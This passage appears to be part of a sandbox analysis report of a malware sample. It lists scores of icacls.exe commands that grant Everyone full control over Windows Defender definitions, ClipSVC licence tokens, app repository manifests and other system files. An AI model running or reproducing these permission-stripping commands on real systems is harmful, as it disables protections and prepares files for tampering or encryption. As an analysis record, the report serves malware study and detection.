- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\00\192 /grant Everyone:F /T /C /Q
  2⤵
  PID:6176
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\0E38E18F-0000-0000-0000-500600000000-0.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:12572
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt /grant Everyone:F /T /C /Q
  2⤵
  PID:11164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsBase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:7672
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsDlta.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:7776
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvBase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:17960
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvDlta.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:7500
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisBase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:15076
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisFull.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:15088
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13756
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\wfp\wfpdiag.etl /grant Everyone:F /T /C /Q
  2⤵
  PID:13632
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java Development Kit\Reference Documentation.url /grant Everyone:F /T /C /Q
  2⤵
  PID:6504
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url /grant Everyone:F /T /C /Q
  2⤵
  PID:10628
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url /grant Everyone:F /T /C /Q
  2⤵
  PID:9744
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:6944
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9012
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoProvisioning.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:12656
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoProvisioning.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:6612
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:10292
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7744
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoHub.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:10764
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoHub.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:424
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:5448
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7516
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.BasicAttractLoop.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:5676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.BasicAttractLoop.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:17932
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Microsoft\Content\Neutral\AppList\AppList.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8736
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoMode.bat /grant Everyone:F /T /C /Q
  2⤵
  PID:10464
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoModeJapanese.bat /grant Everyone:F /T /C /Q
  2⤵
  PID:7344
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\LfSvc\Geofence\GeofenceApplicationID.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:6200
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:10304
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:8124
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx /grant Everyone:F /T /C /Q
  2⤵
  PID:10724
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\tokens.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:10372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6996
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\03f8974b-362e-33e3-2e0b-c7bc2ea01c63.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7984
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\04dc8f1e-f750-388a-f2a5-dc1589650e89.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6320
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0890ad2f-b74f-c384-f684-9c33f8f67924.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7388
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\09ec127d-8158-a906-c12f-44a86e3e994f.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7380
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0a8c1492-65ca-6a01-de25-0e183559d10d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17388
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\13ba8772-845b-29a1-ae9e-fb2793ccf4ea.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15144
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1dae14df-4c42-28af-691e-10cc07a990b4.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17080
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1e225998-faa0-5fd4-4db7-5e7686ee3b47.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6500
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\215f9712-9fca-a3f8-5b11-660eefc73b96.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10556
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\26943e1f-42ed-f190-2895-3bc2b8c4176d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6628
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2657f7c0-8294-58c3-f394-15fe18ba174a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10688
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28502d06-9d29-8514-1e5d-64447116d798.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6956
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28748306-9f02-a5d7-6ded-4459fddadc31.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7468
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2a3adcd0-4ddc-f3d2-6bcb-f11f9cbc1e2c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8364
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3c8c7eb3-7a1d-7981-0472-571cdd1d1292.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9328
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3ebdb897-991b-934f-ee13-2ca21ed81938.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6528
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3f586f55-284b-e455-06b2-84c84e8d0d2d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7004
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\4c4ecbc0-0ec0-3929-aebb-a931a339fb23.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:10528
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\517cfcaf-138b-1796-2cea-62892204250a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7312
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\5b0a39aa-16e0-a938-f694-656664c7be15.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10504
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\600364a7-e11c-efda-2c12-eac40e75f19a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9272
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\61b5bd89-4cb0-db77-6622-cb63b5a58080.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7240
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\630a70e7-1832-4f42-e2a2-5d35fdddc45f.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7948
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\67447b0c-05cf-6740-5f7b-391ab440c42d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9264
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\6e90ed81-9187-fa62-ce90-f18d7bed6b12.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5580
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71c8f37a-a7b9-aff0-6de0-9b276c089ad6.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8528
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71ef3df1-f4b1-69cd-793a-48e165e282aa.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11176
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7309084a-bb6f-20c3-ea54-aa108ceab1ae.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8664
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7646fa0f-b52c-71a8-3aed-950dd1668c09.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8292682a-6850-c06c-9b6d-9646f16d4ed0.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9248
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8ce3d3dd-a4c7-6c38-5fde-1f9f5df98807.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10656
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8d56e57b-8663-136d-ff69-a004e217825a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8228
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\865e8f30-20a1-9528-bb48-42999b5b2aa8.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8e383e90-b2f9-7bf2-1d5b-4e47dcb2014e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9396
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\9d3ad23c-c6b8-7fb5-e4ab-f5d0a66dcfbc.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17384
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a1e5b165-0532-a6a3-f542-0c5c162be3e1.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9152
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a7e08b8b-ad4b-af00-ebcc-1aa29a833ce9.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11872
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ac116a72-b6b1-d558-23f6-10796e634d41.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7256
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ae09332e-6699-a949-7aff-189c895f83c4.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17420
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b34b197c-c0ed-bf12-c9bb-44e883c66a9d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10560
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b81d7e70-84e7-b16a-e3d0-1e7aa2f1232d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10100
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbc7a1c3-44c6-27b6-1e16-487a47263f3e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14060
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbfbe8ad-1a35-a7f3-33bc-40912bf89dfb.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17212
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\be39f553-3158-0a39-de0f-8ddf25885daa.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17268
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c3d42a1a-2f3f-a4a9-6a04-cc1b234485fb.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5060
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c94a6c18-d496-da1c-8a02-fc6976e0145e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bcda97bb-bfd0-2a72-3c90-c8518f3d09ee.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10252
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ca947da2-7e9a-7249-8095-bceb379c6f74.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6404
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\cb692946-a9f3-639d-1064-a6d75a01b9c3.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6764
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d1ecfce2-f845-c1e9-052b-d2f457c135e6.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17272
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d508ba05-d8aa-2836-484d-3833d22fe185.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9840
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d90ad1eb-bec3-18c1-8c97-eef683ba6a1f.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15480
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e2a686b1-b02a-b3e7-90cb-3fa0d708ce04.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15276
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e2a686b1-b02a-b3e7-90cb-3fa0d708ce04.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8492
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e335baf1-18ab-73fe-e089-3fa0a6e71a35.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:18212
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e64ffef1-e246-b632-595b-56076a3fa776.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11852
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8ac9388-7c9c-19cc-fd4d-cb72bb1544ea.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ecbc2601-0a67-4963-e594-43c65d6ec9a5.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\f1bb69b5-a7d1-df8f-5820-49f387fd5d2e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13812
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\eee47229-947d-2ac7-e8a3-49bafee251d1.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12492
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8fff2df-6041-8f21-3df7-db31661aa09b.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9720
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:6760
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:9352
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q
  2⤵
  PID:18240
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\fc93b452-8a84-dede-3b7a-0fc9413c4592.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11600
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\1527c705-839a-4832-9118-54d4Bd6a0c89_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12480
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\c5e2524a-ea46-4f67-841f-6a9465d9d515_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11640
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\CortanaListenUIApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:18324
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopLearning_1000.15063.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:18348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopView_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:18424
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\E2A4F912-2574-4A75-9BB0-0D023378592B_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1704
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17064
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloCamera_1.0.0.5_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4780
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloItemPlayerApp_1.0.0.2_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1812
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloShell_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5132
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8500
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14168
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4228
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15100
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AAD.BrokerPlugin_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13196
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AccountsControl_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15224
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
